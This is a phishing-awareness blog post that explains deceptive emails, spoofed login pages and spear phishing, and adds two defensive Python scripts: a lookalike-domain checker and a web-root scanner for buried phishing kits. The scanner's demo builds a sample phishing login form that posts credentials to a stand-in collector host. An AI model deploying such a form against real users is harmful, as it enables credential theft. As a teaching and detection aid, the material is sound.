Phishing is a serious threat to every individual and business. I'm sure you have already received fraudulent emails that appear to come from your bank, PayPal, or Amazon.
Some of these emails are easily recognized as fakes because of obvious grammatical or spelling errors. Some however are quite sophisticated and can easily fool even experienced individuals.
What do you know about phishing?
What is phishing?
Phishing is the fraudulent attempt to obtain sensitive information such as login credentials or other personally identifiable information (PII), which is any data that could identify a specific individual, such as:
Credit card details,
SSN (social security number),
Bank account information,
Secret question answers
Even partial information can increase the chances of success to subsequent social engineering attacks.
In a phishing attempt, something lures the victim pretending to be a trustworthy entity, such as:
Shops and others
Phishing attempts happen in many ways.
Deceptive email campaigns
Email phishing refers to the practice of sending emails that appear to be from a known or trusted sender with the objective of inducing victims to reveal their confidential information.
Phishing can be targeted or indiscriminate. Today it is easier for us to miss these emails because anti-spam technology has evolved: many of these messages are blocked and never reach our inboxes. If I doubt the validity of an email, the first thing I do is examine the domain of the address it was sent from. Amazon.com.xyz is not an Amazon address: the registered domain is the part just before the top-level domain, which here is com.xyz, not amazon.com.
Here is an example of a phishing campaign which attempted to trick WordPress site owners with a fake notification that their database required an update.
The phishing page was created on a hacked legitimate WordPress website. When clicking on the “Upgrade” button, a fake WordPress login page opens to collect the user credentials.
As part of email phishing, fake website pages are designed to look and sound authentic. Phishing emails usually say that you need to provide/verify/view something urgently and they provide you with a link. This link then leads you to the fake web pages.
Without these emails, there would not be many visitors for the phishing pages with the exception of phishing messages in social networks and SMS.
Carefully crafted phishing login pages convince users they are logging into a valid service. When users fail to notice the login page is fake, attackers receive their login details or credit card information. The stolen credentials and personal information are then used to perform identity theft and fraudulent activities.
This is an example of a fake page we found on a compromised website during an incident response. We identified a phishing directory called “login-apple-account” on a website. When accessing the path via HTTPS, users were led to a very convincing spoof of the Apple ID website:
Phishing in Google docs
Phishing campaigns in Google docs are a part of phishing email campaigns when hackers add malicious links to online documents.
It is quite common to share Google docs, so many people assume it is normal for an organization to share them via Google drive. When people click on Google Drive phishing links, they see something like this:
In this example, the address bar contains a fraudulent URL. However, not everybody pays attention to it, and such a reader subsequently falls victim to the scam.
In most types of phishing attacks, the targets are a wide group of people, for example, Google Docs users. However, in spear phishing attacks, the targets are specific individuals.
Highly targeted attacks are much less common than the other types of mass phishing attacks that we have already discussed, but they do occur.
Malicious actors can look up their victims on websites or even social media platforms, such as Facebook or Instagram, in order to craft a customized scam that can look legitimate.
Spear phishing attempts arrive by email or through e-banking and target a specific victim, either to read their communications (espionage) or to steal a significant amount of money.
These attacks can also target intermediary victims: someone who has some form of access to the intended victim (e.g., a secretary or accountant), whose account can then be used against more important people within the organization, or whose computer can be infected with malware to reach the organization's internal network.
Phishing attacks are widespread and with the holidays so close these malicious practices become even more common.
You should always pay attention to details when entering credentials anywhere on the web. Here are some red flags:
Lack of HTTPS,
Unknown email senders
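The domain check described above (Amazon.com.xyz is not Amazon) and the two red flags just listed can be turned into a small, repeatable check. The following is an added example written for this post, not code from the original article: it parses a link or a From header, enforces a label boundary so that amazon.com.xyz is never mistaken for a subdomain of amazon.com, reports a missing HTTPS scheme, and flags hostnames that reuse a trusted brand name as a label. The allowlist TRUSTED_DOMAINS is a constructed assumption standing in for the services the reader actually uses; the two-label "registered domain" rule is a deliberate simplification that ignores multi-label public suffixes such as co.uk.

```python
from email.utils import parseaddr
from urllib.parse import urlsplit

# Constructed allowlist (assumption): the services the reader has accounts with.
TRUSTED_DOMAINS = {"amazon.com", "paypal.com", "wordpress.com", "apple.com"}
# Brand names derived from the allowlist, used to spot lookalike hostnames.
BRAND_LABELS = {d.split(".")[0] for d in TRUSTED_DOMAINS}


def registrable_domain(host: str) -> str:
    """Last two labels of a hostname, e.g. 'com.xyz' for 'amazon.com.xyz'.
    Simplification: multi-label public suffixes (co.uk) are not handled."""
    labels = host.lower().rstrip(".").split(".")
    return ".".join(labels[-2:])


def host_belongs_to(host: str, domain: str) -> bool:
    """True only when host is the domain itself or a real subdomain of it.
    The leading dot enforces a label boundary, so 'amazon.com.xyz' and
    'notamazon.com' both fail against 'amazon.com'."""
    host = host.lower().rstrip(".")
    return host == domain or host.endswith("." + domain)


def domain_flags(host: str) -> list:
    """Red flags for a hostname taken from a link or a sender address."""
    host = host.lower().rstrip(".")
    if any(host_belongs_to(host, d) for d in TRUSTED_DOMAINS):
        return []
    flags = [f"registered domain is {registrable_domain(host)!r}, not a trusted domain"]
    # A trusted brand appearing as a whole label (amazon.com.xyz, paypal.com.example)
    # is the classic lookalike. Homoglyph tricks (paypa1.com) are not covered here.
    if any(label in BRAND_LABELS for label in host.split(".")):
        flags.append("hostname imitates a trusted brand")
    return flags


def check_link(url: str) -> list:
    """Red flags for a link found in an email, in the order a reader would check."""
    flags = []
    parts = urlsplit(url if "://" in url else "http://" + url)
    if parts.scheme != "https":
        flags.append("no HTTPS")
    flags.extend(domain_flags(parts.hostname or ""))
    return flags


def check_sender(from_header: str) -> list:
    """Red flags for a From header such as 'PayPal <service@paypal.com.example>'."""
    _display_name, addr = parseaddr(from_header)
    if "@" not in addr:
        return ["sender address could not be parsed"]
    return domain_flags(addr.rsplit("@", 1)[1])


if __name__ == "__main__":
    # Constructed sample inputs, not real messages.
    for link in ("https://www.amazon.com/orders", "http://amazon.com.xyz/login"):
        print(link, "->", check_link(link) or "looks fine")
    for sender in ("Amazon <orders@amazon.com>", "PayPal <service@paypal.com.example>"):
        print(sender, "->", check_sender(sender) or "looks fine")
```

The check is allowlist-driven on purpose: anything outside the domains you actually use is reported, and the lookalike flag only adds context. It complements, rather than replaces, looking at the address bar yourself.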
Use 2FA (Two-Factor Authentication) whenever possible. If criminals steal your credentials, they will still not be able to use them without the second factor (SMS, authentication app, hardware token, etc.).
Phishing is usually hard to detect because malicious pages are created deep inside the directory structure. People don’t normally check those directories and unless you know the exact URL of the phishing page, you would never know your site is hacked.
As a webmaster, it is advisable to have an account in Google Search Console to notify you about security problems, including phishing.
Website owners can also use specialized sites like PhishTank.com and VirusTotal.com to figure out if their site hosts phishing pages. Most phishing pages are placed on hacked sites.
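Because phishing kits sit deep inside the directory tree where nobody browses, a webmaster can complement Google Search Console and the lookup services above with a periodic scan of the web root. The following is an added example, not code from the original post or from any product it mentions: it walks a web root, reports directory names that combine a brand word with a credential word (the pattern of the "login-apple-account" directory described earlier), and parses every HTML/PHP file for forms containing a password field, noting how deep they sit and whether they post to a host other than the site's own. The word lists, the demo site layout, and the off-site host collector.example are constructed assumptions for the demonstration.

```python
import os
import tempfile
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Constructed word lists (assumptions, not from the original post).
BRAND_WORDS = {"apple", "paypal", "amazon", "google", "microsoft", "bank"}
CRED_WORDS = {"login", "signin", "account", "verify", "secure", "update", "auth"}


def suspicious_dirname(name: str) -> bool:
    """True for names like 'login-apple-account': a brand word plus a credential word."""
    words = set("".join(c if c.isalnum() else " " for c in name.lower()).split())
    return bool(words & BRAND_WORDS) and bool(words & CRED_WORDS)


class _FormScanner(HTMLParser):
    """Collect every <form> action and whether the form holds a password field."""

    def __init__(self):
        super().__init__()
        self.forms = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        if tag == "form":
            self._current = {"action": a.get("action", ""), "password": False}
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None and a.get("type", "").lower() == "password":
            self._current["password"] = True

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def scan_webroot(root: str, site_host: str) -> list:
    """Walk a web root; return findings a site owner should review by hand."""
    findings = []
    site_host = site_host.lower()
    for dirpath, dirnames, filenames in os.walk(root):
        rel_dir = os.path.relpath(dirpath, root)
        depth = 0 if rel_dir == "." else rel_dir.count(os.sep) + 1
        for d in dirnames:
            if suspicious_dirname(d):
                findings.append({"path": os.path.normpath(os.path.join(rel_dir, d)),
                                 "depth": depth + 1,
                                 "reason": "directory name imitates a brand login"})
        for fn in filenames:
            if not fn.lower().endswith((".html", ".htm", ".php")):
                continue
            with open(os.path.join(dirpath, fn), encoding="utf-8", errors="replace") as fh:
                parser = _FormScanner()
                parser.feed(fh.read())
            for form in parser.forms:
                if not form["password"]:
                    continue
                # A relative action posts back to this site; anything else is off-site.
                action_host = (urlsplit(form["action"]).hostname or site_host).lower()
                external = action_host != site_host and not action_host.endswith("." + site_host)
                findings.append({"path": os.path.normpath(os.path.join(rel_dir, fn)),
                                 "depth": depth,
                                 "reason": ("password form posts off-site to " + action_host)
                                 if external else "password form (same site)"})
    return findings


def build_demo_site() -> str:
    """Create a constructed web root: a legitimate login page plus a phishing
    page buried four levels down, posting to a constructed off-site host."""
    root = tempfile.mkdtemp(prefix="webroot-")
    with open(os.path.join(root, "index.html"), "w") as fh:
        fh.write("<html><body><h1>Welcome</h1></body></html>")
    with open(os.path.join(root, "wp-login.php"), "w") as fh:  # simplified stand-in for the real file
        fh.write('<form action="wp-login.php" method="post">'
                 '<input type="text" name="log"><input type="password" name="pwd"></form>')
    deep = os.path.join(root, "wp-content", "uploads", "2021", "login-apple-account")
    os.makedirs(deep)
    with open(os.path.join(deep, "index.html"), "w") as fh:
        fh.write('<form action="https://collector.example/harvest.php" method="post">'
                 '<input type="email" name="appleid"><input type="password" name="pw"></form>')
    return root


if __name__ == "__main__":
    for finding in scan_webroot(build_demo_site(), "example.org"):
        print(f"[depth {finding['depth']}] {finding['path']}: {finding['reason']}")
```

Same-site password forms are still listed so that a reviewer sees every credential form on the site, not only the obvious off-site one; on a real install the same-site entries are the known login pages, and anything else deserves a look.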